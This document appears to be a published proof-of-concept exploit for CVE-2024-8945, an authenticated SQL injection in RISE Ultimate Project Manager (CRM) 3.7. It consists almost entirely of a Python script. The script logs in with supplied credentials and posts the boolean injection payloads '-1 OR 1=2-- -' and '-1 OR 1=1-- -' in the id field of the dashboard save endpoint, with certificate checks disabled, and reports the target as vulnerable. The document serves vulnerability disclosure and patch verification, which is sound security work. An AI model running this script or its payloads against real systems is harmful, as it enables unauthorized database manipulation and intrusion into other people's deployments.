CodeCanyon Rise CRM 3.7.0 SQL Injection

########PROOF OF CONCEPT####################
    # CVE: CVE-2024-8945
    # Exploit Title: RISE Ultimate Project Manager 3.7 sql injection POC
    # Google Dork: N/A
    # Date: September 19, 2024
    # Exploit Author: Jobyer Ahmed
    # Author Homepage: https://bytium.com
    # Vulnerable Version: 3.7
    # Patched Version: 3.7.1
    # Tested on: Ubuntu 24.04, Debian Testing
    ##########################################
    
    ############Instruction#######################
    # 1. Login to Ultimate Project Manager 3.7
    # 2. Add a New Dashboard
    # 3. Launch the PoC Script
    #
    # Usage: python3 script.py <base_url> <email> <password>
    ###########################################
    
    
    import requests
    import sys
    from termcolor import colored
    
    def login_and_capture_session(base_url, email, password):
        login_url = f"{base_url}/index.php/signin/authenticate"
        login_data = {"email": email, "password": password, "redirect": ""}
        login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
        session = requests.Session()
        response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
        if response.status_code == 200 and "dashboard" in response.url:
            print(colored("[*] Logged in successfully.", "green"))
            return session
        else:
            print(colored("[!] Login failed.", "red"))
            return None
    
    def send_payload(session, target_url, payload):
        data = {
            "id": payload,
            "data": "false",
            "title": "PoC Test",
            "color": "#ff0000"
        }
        response = session.post(target_url, headers=session.headers, data=data, verify=False)
        return response
    
    def verify_vulnerability(session, target_url):
        failed_payload = "-1 OR 1=2-- -"
        failed_response = send_payload(session, target_url, failed_payload)
        
        print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
        print(colored(f"{failed_response.text[:200]}", "cyan"))  
        
        successful_payload = "-1 OR 1=1-- -"
        successful_response = send_payload(session, target_url, successful_payload)
        
        if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
            print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
            print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
        
            print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
        else:
            print(colored("\nNot vulnerable!","red"))
    
    if __name__ == "__main__":
        if len(sys.argv) != 4:
            print("Usage: python3 script.py <base_url> <email> <password>")
            sys.exit(1)
    
        base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
        session = login_and_capture_session(base_url, email, password)
        if not session:
            sys.exit(1)
    
        session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
        target_url = f"{base_url}/index.php/dashboard/save"
    
        verify_vulnerability(session, target_url)